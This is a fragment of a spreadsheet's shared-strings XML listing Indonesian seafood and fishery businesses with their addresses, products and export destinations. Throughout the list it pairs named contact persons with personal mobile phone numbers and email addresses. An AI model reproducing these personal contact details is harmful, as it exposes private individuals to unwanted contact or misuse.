    <t>quality@khomfoods.com</t>
  </si>
  <si>
    <t>Anni Athiah &amp; 081510136324</t>
  </si>
  <si>
    <t>POKLAHSAR KARYA LESTARI</t>
  </si>
  <si>
    <t>Jl. Anyelir XII No.13 X Br. Dukuh, Kel. Dauh Peken, Kec. Tabanan, Kabupaten Tabanan</t>
  </si>
  <si>
    <t>Abon Ikan, Minuman Rumput Laut, Pepes Ikan, Snack Ikan, Produk Perikanan Bernilai Tambah Beku</t>
  </si>
  <si>
    <t>NI MADE PUTRININGSIH WIRNA,SE</t>
  </si>
  <si>
    <t>Tabanan</t>
  </si>
  <si>
    <t xml:space="preserve">Dauh Peken </t>
  </si>
  <si>
    <t>p2mkpkaryalestari@gmail.com</t>
  </si>
  <si>
    <t>I GUSTI AYU PUTU ARYANINGSIH ,SE / 081999841026</t>
  </si>
  <si>
    <t>NI MADE PUTRNINGSIH WIRNA,SE</t>
  </si>
  <si>
    <t>KOPERASI PERIKANAN ARUMABAI</t>
  </si>
  <si>
    <t>Kompleks PPP Goto, Kel. Goto, Kec. Tidore, Kota Tidore Kepulauan</t>
  </si>
  <si>
    <t>ADE KABIR</t>
  </si>
  <si>
    <t>Tidore</t>
  </si>
  <si>
    <t>Goto</t>
  </si>
  <si>
    <t>safritalib87@gmail.com</t>
  </si>
  <si>
    <t>SAFRI TALIB.081243943629</t>
  </si>
  <si>
    <t>MICHEL ERWIN</t>
  </si>
  <si>
    <t>CV. MEKAR RAYA</t>
  </si>
  <si>
    <t>Jl. Datuk Laksmana RT 01 RW 01, Kel. Tanjung Medang, Kec. Rupat Utara, Kabupaten Bengkalis</t>
  </si>
  <si>
    <t>Kerang Segar, Udang Segar, Ikan Pelagis Segar, Ikan Demersal Hidup</t>
  </si>
  <si>
    <t>DAFID</t>
  </si>
  <si>
    <t>Rupat Utara</t>
  </si>
  <si>
    <t>Tanjung Medang</t>
  </si>
  <si>
    <t>charless.zheng@gmail.com</t>
  </si>
  <si>
    <t>Dafid / 085265777228</t>
  </si>
  <si>
    <t>KOPERASI JASA PERIKANAN NGUNGARE BAHARI TERNATE</t>
  </si>
  <si>
    <t>Jl. Kepiting No.16 RT 002 RW 001, Kel. Dufa-dufa, Kec. Ternate Utara, Kota Ternate</t>
  </si>
  <si>
    <t>M.Anwar</t>
  </si>
  <si>
    <t>Dufa-dufa</t>
  </si>
  <si>
    <t>ngungarebahariternate@gmail.com</t>
  </si>
  <si>
    <t>M.ANWAR 082344444426</t>
  </si>
  <si>
    <t>OISHII</t>
  </si>
  <si>
    <t>RT 001 RW 019, Kel. Aermadidi Atas, Kec. Aermadidi, Kabupaten Minahasa Utara</t>
  </si>
  <si>
    <t>Rita Singon</t>
  </si>
  <si>
    <t>Aermadidi</t>
  </si>
  <si>
    <t>Aermadidi Atas</t>
  </si>
  <si>
    <t>ritasingon3@gmail.com</t>
  </si>
  <si>
    <t>Rita 085256742122</t>
  </si>
  <si>
    <t>MOM AKG</t>
  </si>
  <si>
    <t>Jl. Sersan Anwar Bay RT 01, Kel. Bagan Pete, Kec. Alam Barajo, Kota Jambi</t>
  </si>
  <si>
    <t>Patin Asap</t>
  </si>
  <si>
    <t>Aryani</t>
  </si>
  <si>
    <t>Alam Barajo</t>
  </si>
  <si>
    <t>Bagan Pete</t>
  </si>
  <si>
    <t>salaimomAKG@gmail.com</t>
  </si>
  <si>
    <t>CV. JAYA RASA BENGKULU</t>
  </si>
  <si>
    <t>Jl. DP. Negara Gg DP Negara III RT 29 RW 01 No.20, Kel. Sukarami, Kec. Selebar, Kota Bengkulu</t>
  </si>
  <si>
    <t>Kerupuk Tulang Tenggiri</t>
  </si>
  <si>
    <t>Muhammad Rofiq Akbar</t>
  </si>
  <si>
    <t>Selebar</t>
  </si>
  <si>
    <t>Sukarami</t>
  </si>
  <si>
    <t>jayarasabkl@gmail.com</t>
  </si>
  <si>
    <t>Muhammad Rofiq Akbar/082279094900</t>
  </si>
  <si>
    <t>USAHA HASIL LAUT</t>
  </si>
  <si>
    <t>Jl. Abraham O Atururi, Kel. Suprauw, Kec. Maladum Mes, Kota Sorong</t>
  </si>
  <si>
    <t>Lobster Hidup</t>
  </si>
  <si>
    <t>SOLICHIN</t>
  </si>
  <si>
    <t>Maladum Mes</t>
  </si>
  <si>
    <t>Suprauw</t>
  </si>
  <si>
    <t>usahahasillaut@yahoo.com</t>
  </si>
  <si>
    <t>SOLICHIN/082399665056</t>
  </si>
  <si>
    <t>CV. PANUN STAR</t>
  </si>
  <si>
    <t>ABDUL HALIM SOLTIEF</t>
  </si>
  <si>
    <t>cvpanunstar011@gmail.com</t>
  </si>
  <si>
    <t>HALIM/081234234635</t>
  </si>
  <si>
    <t>CV. PURMAR ASEAN ABADI</t>
  </si>
  <si>
    <t>Dusun Sidorukun RT 002 RW 001, Kel. Selo Retno, Kec. Sidomulyo, Kabupaten Lampung Selatan</t>
  </si>
  <si>
    <t>Purwanto</t>
  </si>
  <si>
    <t>Selo Retno</t>
  </si>
  <si>
    <t>purmaraseanabadi@gmail.com</t>
  </si>
  <si>
    <t>Purwanto &amp; 081279631333</t>
  </si>
  <si>
    <t>UD. BINTANG JAYA</t>
  </si>
  <si>
    <t>Komplek Pergudangan Mutiara Margomulyo Indah Blok DC 1, Kel. Manukan Wetan, Kec. Tandes, Kota Surabaya</t>
  </si>
  <si>
    <t>The Hengky</t>
  </si>
  <si>
    <t>jennifergoh1314@gmail.com</t>
  </si>
  <si>
    <t>Jennifer 08113398226</t>
  </si>
  <si>
    <t>OMMEY BASRENG</t>
  </si>
  <si>
    <t>Jl. Wr. Supratman RT 07 No.31, Kel. Kandang Limun, Kec. Muara Bangka Hulu, Kota Bengkulu</t>
  </si>
  <si>
    <t>Sulistiyono</t>
  </si>
  <si>
    <t>Muara Bangka Hulu</t>
  </si>
  <si>
    <t>Kandang Limun</t>
  </si>
  <si>
    <t>ommeyskp@gmail.com</t>
  </si>
  <si>
    <t>sulistiyono</t>
  </si>
  <si>
    <t>SYALOM PONGKOR</t>
  </si>
  <si>
    <t>Desa Kolongan Jaga II No.44, Kec. Kalawat, Kabupaten Minahasa Utara</t>
  </si>
  <si>
    <t>Nila Beku, Sambal Roa, Abon Ikan, Tuna Masak Beku</t>
  </si>
  <si>
    <t>Naomi Linda M. Manangka</t>
  </si>
  <si>
    <t>Kolongan Jaga II</t>
  </si>
  <si>
    <t>lindapongkor@gmail.com</t>
  </si>
  <si>
    <t>Linda 081243141287</t>
  </si>
  <si>
    <t>PT. KOMODITI NUSANTARA SEJAHTERA</t>
  </si>
  <si>
    <t>Jl. Ps. Lelang Ikan Muara Baru No. 87 RT 20 RW 17 Pelabuhan Perikanan Samudera Nizam Zachman, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Sormina Eriana Saragih</t>
  </si>
  <si>
    <t>saragihsormina@gmail.com</t>
  </si>
  <si>
    <t>Sormina, 081292520279</t>
  </si>
  <si>
    <t>UD. MUL MANDAY 88</t>
  </si>
  <si>
    <t>Jl. Pasar Ikan Blok L No.23 Pasar Baru Koto 2, Kel. Malabero, Kec. Teluk Segara, Kota Bengkulu</t>
  </si>
  <si>
    <t>Mulyadi</t>
  </si>
  <si>
    <t>Malabero</t>
  </si>
  <si>
    <t>mulmanday88@gmail.com</t>
  </si>
  <si>
    <t>PT. INDOMINA BAHARI SEJAHTERA</t>
  </si>
  <si>
    <t>Kawasan Pelabuhan Perikanan Samudera Nizam Zachman Jakarta Blok M Kav. No. 9-10, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Tuna Beku, Ikan Demersal Beku, Cephalopoda Beku, Bandeng Beku</t>
  </si>
  <si>
    <t>SUGIANTO</t>
  </si>
  <si>
    <t>indomina_bs@yahoo.com</t>
  </si>
  <si>
    <t>021-22665853</t>
  </si>
  <si>
    <t>Amin / 081393236194</t>
  </si>
  <si>
    <t>NIO'S</t>
  </si>
  <si>
    <t>Perumahan Bumi Kawangkoan Baru, Kel. Kawangkoan Baru Jaga XII, Kec. Kalawat, Kabupaten Minahasa Utara</t>
  </si>
  <si>
    <t>Krispy Ikan, Sambal Roa, Sambal Tuna, Abon Ikan</t>
  </si>
  <si>
    <t>Meynio Sumendap</t>
  </si>
  <si>
    <t>Kawangkoan Baru Jaga XII</t>
  </si>
  <si>
    <t>meyniosumendap@gmail.com</t>
  </si>
  <si>
    <t>Meynio 085341205040</t>
  </si>
  <si>
    <t>Jl. Raya Suli Atas, Kel. Suli, Kec. Salahutu, Kabupaten Maluku Tengah</t>
  </si>
  <si>
    <t>Tuna Loin Beku, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t>ANG BENNY SHAWPINDO</t>
  </si>
  <si>
    <t>Suli</t>
  </si>
  <si>
    <t>lautanbs123@gmail.com</t>
  </si>
  <si>
    <t>VELYA MIDIDONA PAULUS - 082112434843</t>
  </si>
  <si>
    <t>KRISLI LONDAH</t>
  </si>
  <si>
    <t>CV. NA RAHMAT</t>
  </si>
  <si>
    <t>Jl. Medan-Banda Aceh, Kel. Gampong Baro, Kec. Idi Rayeuk, Kabupaten Aceh Timur</t>
  </si>
  <si>
    <t>IRWAN ZULKIFLI</t>
  </si>
  <si>
    <t>Idi Rayeuk</t>
  </si>
  <si>
    <t>Gampong Baro</t>
  </si>
  <si>
    <t>alfianidi@gmail.com</t>
  </si>
  <si>
    <t>UD. PAPUA JAYA BAHARI</t>
  </si>
  <si>
    <t>hasillautpapua77@yahoo.com</t>
  </si>
  <si>
    <t>GUNAWAN/085396948181</t>
  </si>
  <si>
    <t>PT. INDO JAYA FORTUNA</t>
  </si>
  <si>
    <t>Jl. Tanjung Merah, Kel. Manembo Nembo Bawah, Kec. Matuari, Kota Bitung</t>
  </si>
  <si>
    <t>Ikan Demersal Segar, Tuna Beku, Tuna Segar, Ikan Pelagis Beku, Ikan Demersal Beku</t>
  </si>
  <si>
    <t>Manembo Nembo Bawah</t>
  </si>
  <si>
    <t>ijfbitung@gmail.com</t>
  </si>
  <si>
    <t>0438-32306</t>
  </si>
  <si>
    <t>Dudy Mihardja 081586297459</t>
  </si>
  <si>
    <t>DUDY MIHARDJA</t>
  </si>
  <si>
    <t>USAHA LOBSTER WATI</t>
  </si>
  <si>
    <t>Jl. Abraham O. Atururi, Kel. Suprauw, Kec. Maladum Mes, Kota Sorong</t>
  </si>
  <si>
    <t>SULISTYOWATI</t>
  </si>
  <si>
    <t>Sulistyowatigiuztossi59@gmail.com</t>
  </si>
  <si>
    <t>0823-9914-4200</t>
  </si>
  <si>
    <t>SULISTYOWATI/0823-9914-4200</t>
  </si>
  <si>
    <t>PT. BERKAT NISA SURA BIMA</t>
  </si>
  <si>
    <t>Dusun Palikaja RT 14 RW 05, Kel. Laju, Kec. Langgudu, Kabupaten Bima</t>
  </si>
  <si>
    <t>Murni</t>
  </si>
  <si>
    <t>Langgudu</t>
  </si>
  <si>
    <t>Laju</t>
  </si>
  <si>
    <t>ptberkatnisasurabima@gmail.com</t>
  </si>
  <si>
    <t>Murni/085233413104</t>
  </si>
  <si>
    <t>Kawasan Industri Perikanan Samudera Blok K Kav 1, Jl. Muara Baru Ujung (Room 1), Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Ikan Pelagis Beku, Cephalopoda Beku, Daging Tuna Beku</t>
  </si>
  <si>
    <t>jpsolusi@gmail.com</t>
  </si>
  <si>
    <t>CV. SEAFOOD SEJAHTERA PAPUA</t>
  </si>
  <si>
    <t>Jl. Soponyono SP 4, Kel. Wonosari Jaya, Kec. Wania, Kabupaten Mimika</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Ikan Pelagis Beku, Udang Beku, Kepiting Segar</t>
  </si>
  <si>
    <t>Supriady Hadi Setiawan</t>
  </si>
  <si>
    <t>Wania</t>
  </si>
  <si>
    <t>Wonosari jaya</t>
  </si>
  <si>
    <t>cvseafoodsejahterapapua@gmail.com</t>
  </si>
  <si>
    <t>PT. ANUGERAH MAPAN JAYA</t>
  </si>
  <si>
    <t>Jl. Poros Kariango, Dusun Majannang, Kel. Kurusumange, Kec. Tanralili, Kabupaten Maros</t>
  </si>
  <si>
    <t>Alkali Treated Cottonii Chips, Semi Refined Carrageenan</t>
  </si>
  <si>
    <t>HANDOKO SETIONO</t>
  </si>
  <si>
    <t>Kurusumange</t>
  </si>
  <si>
    <t>muhabdalputra03@gmail.com</t>
  </si>
  <si>
    <t>+62 411 4830004</t>
  </si>
  <si>
    <t>INDRAWIANTO &amp; 082188026565</t>
  </si>
  <si>
    <t>INDRAWIANTO</t>
  </si>
  <si>
    <t>USAHA HASIL LAUT RUDI</t>
  </si>
  <si>
    <t>Jl. Macan Tutul RT 001 RW 001, Kel. Dum Barat, Kec. Sorong Kepulauan, Kota Sorong</t>
  </si>
  <si>
    <t>RUDI ANDRA</t>
  </si>
  <si>
    <t>Sorong Kepulauan</t>
  </si>
  <si>
    <t>Dum Barat</t>
  </si>
  <si>
    <t>blu3.hous3@gmail.com</t>
  </si>
  <si>
    <t>0813-4428-9844</t>
  </si>
  <si>
    <t>RUDI/0813-4428-9844</t>
  </si>
  <si>
    <t>PT. AGRO MINA SEMESTA</t>
  </si>
  <si>
    <t>Kawasan Pelabuhan Perikanan Samudera Nizam Zachman, Jl. Muara Baru Ujung Blok K 7D (Room 1), Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Eko Djalmo  Asmadi</t>
  </si>
  <si>
    <t>agrominasemesta4@gmail.com</t>
  </si>
  <si>
    <t>Eko Djalmo Asmadi ( 0812 9981 159 )</t>
  </si>
  <si>
    <t>CV. FAMILI RAJA UDANG</t>
  </si>
  <si>
    <t>Jl. Persatuan Gg Keladi No.61 RT 47, Kel. Manggar Baru, Kec. Balikpapan Timur, Kota Balikpapan</t>
  </si>
  <si>
    <t>Udang Segar, Ikan Demersal Segar, Ikan Pelagis Segar, Udang Beku</t>
  </si>
  <si>
    <t>Punding</t>
  </si>
  <si>
    <t>punding0707@gmail.com</t>
  </si>
  <si>
    <t>Punding/ 082131111161</t>
  </si>
  <si>
    <t>KOPERASI NELAYAN SARUMA PESISIR JAYA</t>
  </si>
  <si>
    <t>Desa Sayoang, Kec. Bacan Timur, Kabupaten Halmahera Selatan</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Ikan Demersal Segar, Ikan Pelagis Beku, Ikan Pelagis Segar, Tuna Beku, Tuna Segar</t>
  </si>
  <si>
    <t>IBNU MUNZAR SOLEMAN</t>
  </si>
  <si>
    <t>Sayoang</t>
  </si>
  <si>
    <t>Kopnel.sarumapesisirjaya@gmail.com</t>
  </si>
  <si>
    <t>Ibnu Munzar Soleman &amp; 082236401050</t>
  </si>
  <si>
    <t>HELMY LENAHATU</t>
  </si>
  <si>
    <t>PT. BINTANG SAMUDERA AGRO TANI MAKMUR</t>
  </si>
  <si>
    <t>Kawasan PPS Nizam Zachman Blok K 7D (Room 2), Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Cephalopoda Beku, Daging Tuna Beku, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t>EKI DWI MAULANA</t>
  </si>
  <si>
    <t>pt.bintangsam@gmail.com</t>
  </si>
  <si>
    <t xml:space="preserve">EKI DWI MAULANA  / 081294650111 </t>
  </si>
  <si>
    <t>UD. SEMANGAT BARU UNIT I</t>
  </si>
  <si>
    <t>Jl. Acsess Road, Kel. Lalang, Kec. Medang Deras, Kabupaten Batu Bara</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar, Ikan Demersal Segar, Udang Segar, Cephalopoda Segar, Siput Segar, Kepiting Segar</t>
  </si>
  <si>
    <t xml:space="preserve">PAIMAN </t>
  </si>
  <si>
    <t>Medang Deras</t>
  </si>
  <si>
    <t>Lalang</t>
  </si>
  <si>
    <t>semangatbarujaya91@gmail.com</t>
  </si>
  <si>
    <t>EDI (08537230082134)</t>
  </si>
  <si>
    <t>PT. BINTANG TIRTA SEMESTA</t>
  </si>
  <si>
    <t>Kawasan PPS Nizam Zachman Blok K 7D (Room 3), Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Ir. Eko Djalmo Asmadi</t>
  </si>
  <si>
    <t>bintangtirtasemesta@gmail.com</t>
  </si>
  <si>
    <t>Ir. Eko Djalmo Asmadi / 08129981159</t>
  </si>
  <si>
    <t>Jl. Kima 9 Kav L No.7A, Kel. Daya, Kec. Biringkanaya, Kota Makassar</t>
  </si>
  <si>
    <t>bumimenarainternusamakassar2@gmail.com</t>
  </si>
  <si>
    <t>0411-515660</t>
  </si>
  <si>
    <t>APRIANSYAH - 082150757394</t>
  </si>
  <si>
    <t>CV. BERKAH LAUTAN ILAHI</t>
  </si>
  <si>
    <t>Jl. Danau Towuti, Kel. Rufei, Kec. Sorong Barat, Kota Sorong</t>
  </si>
  <si>
    <t>ZAINUDDIN</t>
  </si>
  <si>
    <t>Sorong Barat</t>
  </si>
  <si>
    <t>Rufei</t>
  </si>
  <si>
    <t>cvberkahlautanilahi@gmail.com</t>
  </si>
  <si>
    <t>ZAINUDDIN/082111111799</t>
  </si>
  <si>
    <t>PENGGILINGAN BAKSO RIKA 87</t>
  </si>
  <si>
    <t>Jl. Pariwisata Pasar Bengkulu RT 08, Kel. Pasar Bengkulu, Kec. Sungai Serut, Kota Bengkulu</t>
  </si>
  <si>
    <t>Surimi Beku, Pempek Ikan, Tekwan Ikan</t>
  </si>
  <si>
    <t>RIKA OVTIANA</t>
  </si>
  <si>
    <t>Sungai Serut</t>
  </si>
  <si>
    <t>Pasar Bengkulu</t>
  </si>
  <si>
    <t>rikabakso87@gmail.com</t>
  </si>
  <si>
    <t>RIKA OVTIANA/085268225154</t>
  </si>
  <si>
    <t>UNI JN</t>
  </si>
  <si>
    <t>Jl. Sungai Hitam RT 12 No.23, Kel. Pasar Pedati, Kec. Pondok Kelapa, Kabupaten Bengkulu Tengah</t>
  </si>
  <si>
    <t>Teri Crispy, Basreng Ikan</t>
  </si>
  <si>
    <t>JUNIATI</t>
  </si>
  <si>
    <t>Pondok Kelapa</t>
  </si>
  <si>
    <t>Pasar Pedati</t>
  </si>
  <si>
    <t>unijnskp@gmail.com</t>
  </si>
  <si>
    <t>Juniati/082381302153</t>
  </si>
  <si>
    <t>UD. SUMBER REZEKI</t>
  </si>
  <si>
    <t>ERWIN MICHEL</t>
  </si>
  <si>
    <t xml:space="preserve">Tidore </t>
  </si>
  <si>
    <t>erwinmichel522@gmail.com</t>
  </si>
  <si>
    <t>Erwin Michel &amp; 085270208585</t>
  </si>
  <si>
    <t>UD. CAHAYA MARINA FISHERY</t>
  </si>
  <si>
    <t>HENOCH BUDI SETIAWAN</t>
  </si>
  <si>
    <t>kusgianto_t@yahoo.com</t>
  </si>
  <si>
    <t>0811-951-051</t>
  </si>
  <si>
    <t>KUSGIANTO/0811-951-051</t>
  </si>
  <si>
    <t>KUSGIANTO TEDJO MULYONO</t>
  </si>
  <si>
    <t>alamat_printed</t>
  </si>
  <si>
    <t>province_id</t>
  </si>
  <si>
    <t>produk_ind</t>
  </si>
  <si>
    <t>realisasi</t>
  </si>
  <si>
    <t>lokal</t>
  </si>
  <si>
    <t>ekspor</t>
  </si>
  <si>
    <t>Jl. Raya Kemantrenrejo Km 10 RT 07 RW 01, Kel. Kemantren Rejo, Kec. Rejoso, Kabupaten Pasuruan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kerang Bernilai Tambah Beku</t>
  </si>
  <si>
    <t>Jl. Bubara, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat</t>
  </si>
  <si>
    <t>Jl. Dermaga No.8, Kel. Purnama, Kec. Dumai Barat, Kota Dumai&lt;br&gt;Riau</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Senangin, Manyung, Kerapu, Bawal, Kakap)</t>
  </si>
  <si>
    <t>Malaysia</t>
  </si>
  <si>
    <t>Jl. Emboen Suryana, Kel. Sambutan, Kec. Samarinda Ilir, Kota Samarinda&lt;br&gt;Kalimantan Timur</t>
  </si>
  <si>
    <t>JL Prof. DR. Latumenten No.109 H, Kel. Angke, Kec. Tambora, Kota Jakarta Barat&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Nori</t>
  </si>
  <si>
    <t>Jl. Pemelisan I Gg. Ikan Tumbuk No.17, Kel. Sesetan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>Jl. Lingkar Timur No.5, Kel. Tegalkamulyan, Kec. Cilacap Selatan, Kabupaten Cilacap&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Kerang Rebus Beku</t>
  </si>
  <si>
    <t>Jl. Husein Sastranegara No.109 RT 003 RW 010 Room 09, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Kerang Beku</t>
  </si>
  <si>
    <t>Kota Tangerang</t>
  </si>
  <si>
    <t>Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)</t>
  </si>
  <si>
    <t>Salmon Beku, Trout Beku</t>
  </si>
  <si>
    <t>Jl. Husein Sastranegara No.109 RT 003 RW 010 Room 07, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Jl. Kima Raya I Kav D-1B, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Udang Rebus Beku</t>
  </si>
  <si>
    <t>Daging Rajungan Bernilai Tambah Beku</t>
  </si>
  <si>
    <t>Daging Rajungan Pasteurisasi Dingin</t>
  </si>
  <si>
    <t>Daging Rajungan Pasteurisasi Beku</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemadang, Pedang, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kerapu, Kakap, Barramundi)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kerapu, Kakap, Barramundi)</t>
  </si>
  <si>
    <t>Cumi-cumi Bernilai Tambah Beku</t>
  </si>
  <si>
    <t>Jl. TWK Abdul Aziz No.32, Kel. Merduati, Kec. Kuta Raja, Kota Banda Aceh&lt;br&gt;Aceh</t>
  </si>
  <si>
    <t>Cephalopoda Segar (Cumi-cumi, Gurita, Sotong)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kakap, Kerapu, Bawal, Baronang)</t>
  </si>
  <si>
    <t>Jl. Raya Perancis Blok B3 No.1 RT 04 RW 08, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Perut Ikan Kering</t>
  </si>
  <si>
    <t>Udang Ronggeng Hidup</t>
  </si>
  <si>
    <t>Ikan Air Tawar Beku (Lele, Mas, Gurami, Betutu, Patin, Nila)</t>
  </si>
  <si>
    <t>China</t>
  </si>
  <si>
    <t>Lobster Beku, Kepiting Beku</t>
  </si>
  <si>
    <t>Sirip Hiu Kering, Kulit Hiu Kering, Tulang Hiu Kering</t>
  </si>
  <si>
    <t>Hiu Beku</t>
  </si>
  <si>
    <t>Telur Ikan Beku</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Tongkol, Kembung, Makerel, Marlin, Selar, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Manyung, Kerapu, Layur, Bawal, Kakap, Barramundi)</t>
  </si>
  <si>
    <t>Jl. W. Mongisidi KM 5, Kel. Wangurer Timur LK 1 RT 05, Kec. Madidir, Kota Bitung&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Ekstrak Air Rebusan Ikan</t>
  </si>
  <si>
    <t>Jl. Buntu Komplek Pelabuhan Perikanan Pantai Tarakan, Kel. Karang Anayar Pantai, Kec. Tarakan Barat, Kota Tarakan&lt;br&gt;Kalimantan Utara</t>
  </si>
  <si>
    <t>Kerang Hidup</t>
  </si>
  <si>
    <t>Jl. Rungkut Industri III No.81- 83, Kel. Rungkut Tengah, Kec. Gunung Anyar, Kota Surabaya&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Jl. Raya Sugih Waras, Dusun Jabung, Kel. Sugihwaras, Kec. Jenu, Kabupaten Tuban&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Cephalopoda Beku (Cumi-Cumi)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tenggiri)</t>
  </si>
  <si>
    <t>Teri Nasi Beku</t>
  </si>
  <si>
    <t>Ikan Kering</t>
  </si>
  <si>
    <t>Jl. Jlamprang Krapyak Lor Blok S Tembok RT 004 RW 002, Kel. Krapyak , Kec. Pekalongan Utara , Kota Pekalongan&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Mata Besar, Gulama, Kuniran, Layur, Beloso, Bawal, Rejung, Jaket)</t>
  </si>
  <si>
    <t>Kabupaten Tuban</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Tembang, Sarden, Layang)</t>
  </si>
  <si>
    <t>Kota Semarang</t>
  </si>
  <si>
    <t>Japan</t>
  </si>
  <si>
    <t>Jl. Cipatuguran SLK IPB Kampung Neglasari RT 03 RW 20, Kel. Palabuhanratu, Kec. Palabuhanratu, Kabupaten Sukabumi&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Fillet Sidat Beku</t>
  </si>
  <si>
    <t>Japan, Korea, Democratic People's Republic of</t>
  </si>
  <si>
    <t>Kp. Gaga Rawa Kompeni RT 001 RW 008, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Keong Hidup</t>
  </si>
  <si>
    <t>Ikan Hasil Budidaya Beku (Lele, Gurame, Bandeng, Patin)</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat</t>
  </si>
  <si>
    <t xml:space="preserve">Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Bakso Udang, Tofu, Siomay, Cutlet, Naget, Udang Bungkus, Udang Berlapis Tepung, Ikan Berlapis Tepung, Roll Udang) </t>
  </si>
  <si>
    <t>Ikan Demesal Beku (Mata Goyang, Gulama, Kuniran, Remang, Layur, Rejung, Ayam-ayam, Kurisi)</t>
  </si>
  <si>
    <t>Jl. Raya Rembang Sarang, Kel. Labuhan Kidul, Kec. Sluke, Kabupaten Rembang&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Ikan Air Tawar Beku (Gurami, Patin, Nila)</t>
  </si>
  <si>
    <t>Jl. Terboyo Industri Barat Blok E No.4 Kawasan Industri Terboyo, Kel. Trimulyo, Kec. Genuk, Kota Semarang&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Rumput Laut Beku</t>
  </si>
  <si>
    <t>Jl. Dermaga II RT 003 RW 019, Kel. Palabuhanratu, Kec. Palabuhanratu, Kabupaten Sukabumi&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Tongkol, Tembang, Salem, Selar, Layang, Tenggiri)</t>
  </si>
  <si>
    <t>China, Malaysia, Singapore, Viet Nam</t>
  </si>
  <si>
    <t>Kawasan Industri Terboyo Blok F No.16A, Kel. Trimulyo, Kec. Genuk, Kabupaten Semarang&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Kabupaten Semarang</t>
  </si>
  <si>
    <t>Telur Ikan Terbang Beku</t>
  </si>
  <si>
    <t>Pasta Ikan Beku</t>
  </si>
  <si>
    <t>&lt;br&gt;Jawa Tengah"</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Swanggi, Gulama, Kuniran, Kerapu, Bawal, Ekor Kuning)</t>
  </si>
  <si>
    <t>Australia</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Pergudangan Bandara Mas Blok M No.21, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Labi-Labi Hidup</t>
  </si>
  <si>
    <t>Perut Ikan Beku</t>
  </si>
  <si>
    <t>Kabupaten Pinrang</t>
  </si>
  <si>
    <t>Jl. Rungkut Industri III No.85, Kel. Rungkut Tengah, Kec. Gunung Anyar, Kota Surabaya&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Gulama, Lencam, Manyung, Kerapu, Kakatua, Kakap, Kurisi, Barramundi)</t>
  </si>
  <si>
    <t>China, Malaysia</t>
  </si>
  <si>
    <t>Jl. Raya Tanjung Bintang No.99, Kel. Serdang, Kec. Tanjung Bintang, Kabupaten Lampung Selatan&lt;br&gt;Lampung</t>
  </si>
  <si>
    <t>Daging Rajungan Pasteurisasi Dalam Kaleng, Cup Plastik, Kantung Plastik, Pouch Aluminium</t>
  </si>
  <si>
    <t>China, United Kingdom, United States</t>
  </si>
  <si>
    <t>Dusun Kunti RT 001 RW 004, Kel. Mranggen, Kec. Purwoasri, Kabupaten Kediri&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Produk Perikanan Bernilai Tambah Beku (Springroll Seafood, Roll Udang, Siomay Udang, Martabak Udang, Lumpia Seafood, Lumpia Udang, Otak-Otak Ikan, Wonton, Samosa)</t>
  </si>
  <si>
